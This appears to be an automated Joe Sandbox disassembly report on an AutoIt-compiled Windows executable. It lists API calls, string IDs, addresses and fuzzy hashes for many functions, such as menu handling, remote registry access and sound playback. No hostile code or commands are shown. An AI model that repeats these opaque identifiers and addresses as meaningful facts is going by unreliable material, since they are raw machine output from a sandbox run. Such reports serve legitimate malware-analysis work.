                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                    • String ID: (
                                                                    • API String ID: 2598888154-3887548279
                                                                    • Opcode ID: 48c5ffea9c3ada7645d02b580494afed38ec64b6de200f3a214cc6f3bb391c19
                                                                    • Instruction ID: 7fe0270d2854fd6ae1e533ae3598458725ba839ab098096f4c4c05615c31962a
                                                                    • Opcode Fuzzy Hash: 48c5ffea9c3ada7645d02b580494afed38ec64b6de200f3a214cc6f3bb391c19
                                                                    • Instruction Fuzzy Hash: 7D512BB5900309EFDB25CFA8C885EAFBBB9EF48310F14852DFA9997210D775A940CB50
                                                                    APIs
                                                                      • Part of subcall function 00FF0957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00FD6B0C,?,00008000), ref: 00FF0973
                                                                      • Part of subcall function 00FD4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FD4743,?,?,00FD37AE,?), ref: 00FD4770
                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00FD6BAD
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00FD6CFA
                                                                      • Part of subcall function 00FD586D: _wcscpy.LIBCMT ref: 00FD58A5
                                                                      • Part of subcall function 00FF363D: _iswctype.LIBCMT ref: 00FF3645
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                    • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                    • API String ID: 537147316-1018226102
                                                                    • Opcode ID: d4bf3dbad4fe37a2c8ec623c51027354386a0a40a6c846e4cc91080312afef85
                                                                    • Instruction ID: 025c9271be693580065534449d74cf60228b8b751e85be8234562d30c6718b5c
                                                                    • Opcode Fuzzy Hash: d4bf3dbad4fe37a2c8ec623c51027354386a0a40a6c846e4cc91080312afef85
                                                                    • Instruction Fuzzy Hash: 4902BB311083419FD725EF24C880AAFBBE6BF98314F08481EF5C9972A2DB34D949DB52
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 01032D50
                                                                    • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 01032DDD
                                                                    • GetMenuItemCount.USER32(01095890), ref: 01032E66
                                                                    • DeleteMenu.USER32(01095890,00000005,00000000,000000F5,?,?), ref: 01032EF6
                                                                    • DeleteMenu.USER32(01095890,00000004,00000000), ref: 01032EFE
                                                                    • DeleteMenu.USER32(01095890,00000006,00000000), ref: 01032F06
                                                                    • DeleteMenu.USER32(01095890,00000003,00000000), ref: 01032F0E
                                                                    • GetMenuItemCount.USER32(01095890), ref: 01032F16
                                                                    • SetMenuItemInfoW.USER32(01095890,00000004,00000000,00000030), ref: 01032F4C
                                                                    • GetCursorPos.USER32(?), ref: 01032F56
                                                                    • SetForegroundWindow.USER32(00000000), ref: 01032F5F
                                                                    • TrackPopupMenuEx.USER32(01095890,00000000,?,00000000,00000000,00000000), ref: 01032F72
                                                                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 01032F7E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                    • String ID:
                                                                    • API String ID: 3993528054-0
                                                                    • Opcode ID: 6a1d9cc2f5bdd9f84cd04b80864faa56419f278eb6d621cde65a33febafaa019
                                                                    • Instruction ID: 6d803edb5ea2c453afc63297c110e15d79a075f0615e5ecb57c65bdd5d3f6848
                                                                    • Opcode Fuzzy Hash: 6a1d9cc2f5bdd9f84cd04b80864faa56419f278eb6d621cde65a33febafaa019
                                                                    • Instruction Fuzzy Hash: 4871C570600206BEFB219F58DC49FAABFACFF84754F144256F7A5AA1D0C7756820CBA0
                                                                    APIs
                                                                      • Part of subcall function 00FD7BCC: _memmove.LIBCMT ref: 00FD7C06
                                                                    • _memset.LIBCMT ref: 0102786B
                                                                    • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 010278A0
                                                                    • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 010278BC
                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 010278D8
                                                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 01027902
                                                                    • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0102792A
                                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 01027935
                                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0102793A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                                    • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                    • API String ID: 1411258926-22481851
                                                                    • Opcode ID: 65c37711702cce5ef6b86dab53f0f11b000d7be3ca14969f6152d200a3444dff
                                                                    • Instruction ID: 1210fdde078dda5925af774e967a90ad4d8c935ca280c63fd76eec79f119e3b0
                                                                    • Opcode Fuzzy Hash: 65c37711702cce5ef6b86dab53f0f11b000d7be3ca14969f6152d200a3444dff
                                                                    • Instruction Fuzzy Hash: 81412872C10229AACF21EBA4DC85DEEB7B9FF14710F44406AF945A7261EB399904DB90
                                                                    APIs
                                                                    • CharUpperBuffW.USER32(?,?,?,?,?,?,?,0104FDAD,?,?), ref: 01050E31
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: BuffCharUpper
                                                                    • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                    • API String ID: 3964851224-909552448
                                                                    • Opcode ID: d61bc5655e110c49e2555c756a00053cb6d526954fc1a2fa17a7c16bf2c866c8
                                                                    • Instruction ID: 7aafd6793aaf7d0b4e70ae08f83670f75a3d1dd402ff48e68a7fa94e3d7fcf90
                                                                    • Opcode Fuzzy Hash: d61bc5655e110c49e2555c756a00053cb6d526954fc1a2fa17a7c16bf2c866c8
                                                                    • Instruction Fuzzy Hash: 4C41573110424A8BCF81FE18DD61AFF37A0BF41304F144445FCD51B6AADB399919DBA0
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,0100E2A0,00000010,?,Bad directive syntax error,0105F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 0102F7C2
                                                                    • LoadStringW.USER32(00000000,?,0100E2A0,00000010), ref: 0102F7C9
                                                                      • Part of subcall function 00FD7DE1: _memmove.LIBCMT ref: 00FD7E22
                                                                    • _wprintf.LIBCMT ref: 0102F7FC
                                                                    • __swprintf.LIBCMT ref: 0102F81E
                                                                    • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 0102F88D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                                    • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                    • API String ID: 1506413516-4153970271
                                                                    • Opcode ID: 44198db8d94a228524dfb96357e83a4cb201430dfbf90f3537d00b8fdc1c9e28
                                                                    • Instruction ID: 22f3fb48bbb1a6fbeff84e89e9242f7f884703432c658d0f3686fc2047044c23
                                                                    • Opcode Fuzzy Hash: 44198db8d94a228524dfb96357e83a4cb201430dfbf90f3537d00b8fdc1c9e28
                                                                    • Instruction Fuzzy Hash: AA21713190421EAFCF11FF90CC0AEFE7779BF18300F04445AF5456A161EA7A9618EB51
                                                                    APIs
                                                                      • Part of subcall function 00FD7BCC: _memmove.LIBCMT ref: 00FD7C06
                                                                      • Part of subcall function 00FD7924: _memmove.LIBCMT ref: 00FD79AD
                                                                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 01035330
                                                                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 01035346
                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 01035357
                                                                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 01035369
                                                                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0103537A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: SendString$_memmove
                                                                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                    • API String ID: 2279737902-1007645807
                                                                    • Opcode ID: 14c175e53c57600c201bf8ea94522954e4f52ea240ea4f67689d3dcb846db0f3
                                                                    • Instruction ID: dacbe4d19e2c8f5880f464fab00a709846778a49ae8cec7dbbff321399b2c5fd
                                                                    • Opcode Fuzzy Hash: 14c175e53c57600c201bf8ea94522954e4f52ea240ea4f67689d3dcb846db0f3
                                                                    • Instruction Fuzzy Hash: 42110471A9422979D760B676CC4ADFF7BBCFFD5B00F84445BB481AA1A1EAA04804C5A0
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                    • String ID: 0.0.0.0
                                                                    • API String ID: 208665112-3771769585
                                                                    • Opcode ID: 2355cbc6edc4a20d84f511cb216886c1b4c1b483c56fd3c5db9975b378e940d8
                                                                    • Instruction ID: 736d98169a21622e06da57a78217aabaf552eda9ae5e076a2a73c956ca164dab
                                                                    • Opcode Fuzzy Hash: 2355cbc6edc4a20d84f511cb216886c1b4c1b483c56fd3c5db9975b378e940d8
                                                                    • Instruction Fuzzy Hash: A61105315002196BDB61AA349C4AEFF7BBCEF42311F0001AAF5C5DA061EF798981C750
                                                                    APIs
                                                                    • timeGetTime.WINMM ref: 01034F7A
                                                                      • Part of subcall function 00FF049F: timeGetTime.WINMM(?,75A8B400,00FE0E7B), ref: 00FF04A3
                                                                    • Sleep.KERNEL32(0000000A), ref: 01034FA6
                                                                    • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 01034FCA
                                                                    • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 01034FEC
                                                                    • SetActiveWindow.USER32 ref: 0103500B
                                                                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 01035019
                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 01035038
                                                                    • Sleep.KERNEL32(000000FA), ref: 01035043
                                                                    • IsWindow.USER32 ref: 0103504F
                                                                    • EndDialog.USER32(00000000), ref: 01035060
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                    • String ID: BUTTON
                                                                    • API String ID: 1194449130-3405671355
                                                                    • Opcode ID: 22c62ac847ce5be3cbf6916a0875264d21656e9e1bd75f8e2c82eb91778b2fab
                                                                    • Instruction ID: f987fb31edc589b5390cdd2edb2885bf9076feffcc8416eb68b22318887fabcb
                                                                    • Opcode Fuzzy Hash: 22c62ac847ce5be3cbf6916a0875264d21656e9e1bd75f8e2c82eb91778b2fab
                                                                    • Instruction Fuzzy Hash: 47215070204206AFE7315F35EC98B2B7BADFB8B745F091014F2C5861A9DB6F8D509761
                                                                    APIs
                                                                      • Part of subcall function 00FD9837: __itow.LIBCMT ref: 00FD9862
                                                                      • Part of subcall function 00FD9837: __swprintf.LIBCMT ref: 00FD98AC
                                                                    • CoInitialize.OLE32(00000000), ref: 0103D5EA
                                                                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0103D67D
                                                                    • SHGetDesktopFolder.SHELL32(?), ref: 0103D691
                                                                    • CoCreateInstance.OLE32(01062D7C,00000000,00000001,01088C1C,?), ref: 0103D6DD
                                                                    • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0103D74C
                                                                    • CoTaskMemFree.OLE32(?,?), ref: 0103D7A4
                                                                    • _memset.LIBCMT ref: 0103D7E1
                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 0103D81D
                                                                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0103D840
                                                                    • CoTaskMemFree.OLE32(00000000), ref: 0103D847
                                                                    • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0103D87E
                                                                    • CoUninitialize.OLE32(00000001,00000000), ref: 0103D880
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                    • String ID:
                                                                    • API String ID: 1246142700-0
                                                                    • Opcode ID: 559f20fe0a9fcfa3f2f81dc7110d1151cde6f455d764e97a336466ac80f58fe5
                                                                    • Instruction ID: 5a7eb7bf748676967966bd5e051c0a5e3eff2ea08d14a28ec2ce63dc201981a9
                                                                    • Opcode Fuzzy Hash: 559f20fe0a9fcfa3f2f81dc7110d1151cde6f455d764e97a336466ac80f58fe5
                                                                    • Instruction Fuzzy Hash: 1CB11B75A00209AFDB04DFA4C888DAEBBF9FF88314F148499E949EB251DB35ED41DB50
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,00000001), ref: 0102C283
                                                                    • GetWindowRect.USER32(00000000,?), ref: 0102C295
                                                                    • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0102C2F3
                                                                    • GetDlgItem.USER32(?,00000002), ref: 0102C2FE
                                                                    • GetWindowRect.USER32(00000000,?), ref: 0102C310
                                                                    • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0102C364
                                                                    • GetDlgItem.USER32(?,000003E9), ref: 0102C372
                                                                    • GetWindowRect.USER32(00000000,?), ref: 0102C383
                                                                    • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0102C3C6
                                                                    • GetDlgItem.USER32(?,000003EA), ref: 0102C3D4
                                                                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0102C3F1
                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 0102C3FE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Window$ItemMoveRect$Invalidate
                                                                    • String ID:
                                                                    • API String ID: 3096461208-0
                                                                    • Opcode ID: 578770f04baf3c24b387d9109eb359adda2e0c6e0063bb7bf56524b8a445aa52
                                                                    • Instruction ID: 17953bcb2d62aadc9fef68bd371ee5faca215f324c6bd3dc989590b9704cb3d3
                                                                    • Opcode Fuzzy Hash: 578770f04baf3c24b387d9109eb359adda2e0c6e0063bb7bf56524b8a445aa52
                                                                    • Instruction Fuzzy Hash: 2D516171B00205ABDB18CFADDD89A6EBBB9EB88310F14856DF515D7294DB7599008B10
                                                                    APIs
                                                                      • Part of subcall function 00FD1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00FD2036,?,00000000,?,?,?,?,00FD16CB,00000000,?), ref: 00FD1B9A
                                                                    • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00FD20D3
                                                                    • KillTimer.USER32(-00000001,?,?,?,?,00FD16CB,00000000,?,?,00FD1AE2,?,?), ref: 00FD216E
                                                                    • DestroyAcceleratorTable.USER32(00000000), ref: 0100BCA6
                                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00FD16CB,00000000,?,?,00FD1AE2,?,?), ref: 0100BCD7
                                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00FD16CB,00000000,?,?,00FD1AE2,?,?), ref: 0100BCEE
                                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00FD16CB,00000000,?,?,00FD1AE2,?,?), ref: 0100BD0A
                                                                    • DeleteObject.GDI32(00000000), ref: 0100BD1C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                    • String ID:
                                                                    • API String ID: 641708696-0
                                                                    • Opcode ID: 571f70944787597d21982e2f19a07e885a676c95c4e3e781c4f1cf4b9092b544
                                                                    • Instruction ID: 595f3bf3343769f62b45bb3d48b5de712d32114cc4c6f1523b7efae26d0d3271
                                                                    • Opcode Fuzzy Hash: 571f70944787597d21982e2f19a07e885a676c95c4e3e781c4f1cf4b9092b544
                                                                    • Instruction Fuzzy Hash: 1C61E135504701DFDB76AF19D858B2AB7F2FF50312F18841BE1C25B6A4C77AA881EB81
                                                                    APIs
                                                                      • Part of subcall function 00FD25DB: GetWindowLongW.USER32(?,000000EB), ref: 00FD25EC
                                                                    • GetSysColor.USER32(0000000F), ref: 00FD21D3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: ColorLongWindow
                                                                    • String ID:
                                                                    • API String ID: 259745315-0
                                                                    • Opcode ID: dd6ce67b00c360bbf61be0a523a4c63005d0de3b6ba125be56ab530e9a9477e1
                                                                    • Instruction ID: d0617f74fdceb1b888ef93cdac3476a90697b76be749442de5f6437b60172118
                                                                    • Opcode Fuzzy Hash: dd6ce67b00c360bbf61be0a523a4c63005d0de3b6ba125be56ab530e9a9477e1
                                                                    • Instruction Fuzzy Hash: 7B41BC354042409FEF665F28DC48BB93B66EB16332F184356FEA58B2D5C7368C41EB61
                                                                    APIs
                                                                    • CharLowerBuffW.USER32(?,?,0105F910), ref: 0103A90B
                                                                    • GetDriveTypeW.KERNEL32(00000061,010889A0,00000061), ref: 0103A9D5
                                                                    • _wcscpy.LIBCMT ref: 0103A9FF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: BuffCharDriveLowerType_wcscpy
                                                                    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                    • API String ID: 2820617543-1000479233
                                                                    • Opcode ID: 426f97a7d1b518d44519360239b437dfda0ae7e6a171f97f39ba97df6936c768
                                                                    • Instruction ID: cfe52b22864e2ef5afb0056c1f81ac7d3ce7eaf94f0a1f6b204f9f7549db78c4
